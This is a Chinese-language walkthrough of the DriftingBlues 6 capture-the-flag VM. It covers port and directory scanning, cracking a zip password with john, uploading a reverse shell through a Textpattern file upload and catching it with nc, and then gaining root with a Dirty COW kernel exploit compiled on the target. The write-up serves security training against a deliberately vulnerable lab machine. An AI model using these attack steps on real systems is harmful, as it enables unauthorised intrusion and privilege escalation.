信息搜集
主机扫描
arp-scan -l端口扫描
┌──(root㉿kali)-[~/blue6]
└─# nmap -sV -p- 192.168.254.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 04:25 EDT
Nmap scan report for 192.168.254.133
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
MAC Address: 08:00:27:C8:A6:E8 (Oracle VirtualBox virtual NIC)
路径扫描
┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.133
===============================================================
===============================================================
/db (Status: 200) [Size: 53656]
/index (Status: 200) [Size: 750]
/index.html (Status: 200) [Size: 750]
/robots (Status: 200) [Size: 110]
/robots.txt (Status: 200) [Size: 110]
/spammer (Status: 200) [Size: 179]
/spammer.zip (Status: 200) [Size: 179]
80端口
进入robots.txt,发现一个路径,访问进去发现登录界面
http://192.168.254.133/textpattern/textpattern/
不知道,密码,但上面有一个zip没有用,下载下来看看有什么东西
┌──(root㉿kali)-[~/blue6]
└─# curl http://192.168.254.133/spammer.zip -o 1.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 179 100 179 0 0 77927 0 --:--:-- --:--:-- --:--:-- 89500
发现需要密码使用john爆破
┌──(root㉿kali)-[~/blue6]
└─# zip2john 1.zip > hash
ver 2.0 1.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D ts=ADCB cs=b003 type=0
┌──(root㉿kali)-[~/blue6]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (1.zip/creds.txt) 解压发现了用户名密码,用ssh连接不对,那应该是网站的用户名和密码
┌──(root㉿kali)-[~/blue6]
└─# cat creds.txt
mayer:lionheart 获取shell
登录进去后,发现有一个文件上传点,于是我们尝试反弹shell,下图生成反弹shell
然后我们上传监听访问
nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.254.205] from (UNKNOWN) [192.168.254.133] 46571
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
03:47:05 up 22 min, 0 users, load average: 0.00, 3.86, 9.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
提权
成功拿到shell,搜寻发现一个用户都没有,尝试老法子,提提权
- sudo -l 没用
- cat /etc/crontab 无重要信息
- find / -perm -u=s -type f 2>/dev/null 并没有发现什么重要文件
- /usr/sbin/getcap -r 2>/dev/null
- find / -writable 2>/dev/null
- uname -a
最终都没有什么可以用的东西,于是下载linpeas.sh和pspy64,在linpeas.sh发现一个秘钥文件,但好像用不上,没办法只能看看师傅的wp了,说要使用内核提权,好久没有碰到这种靶场了,
但我们发现编译必须要用靶机的gcc编译,否则会因为编译器的问题,导致版本报错,避坑
www-data@driftingblues:/tmp$ gcc 2.c -o cowroot -pthread
gcc 2.c -o cowroot -pthread
www-data@driftingblues:/tmp$ ls
ls
1.c
2.c
cowroot
www-data@driftingblues:/tmp$ ./cowroot
./cowroot
id
uid=0(firefart) gid=33(www-data) groups=0(root),33(www-data)
whoami
firefart
cd /root
ls
root.txt
user.txt
cat root.txt
CCAD89B795EE7BCF7BBAD5A46F40F488
cat user.txt
5355B03AF00225CFB210AE9CA8931E51
成功拿到root文件与user文件,很有趣的一个靶场
知识点
- 内核提权
- 文件上传
Comments | NOTHING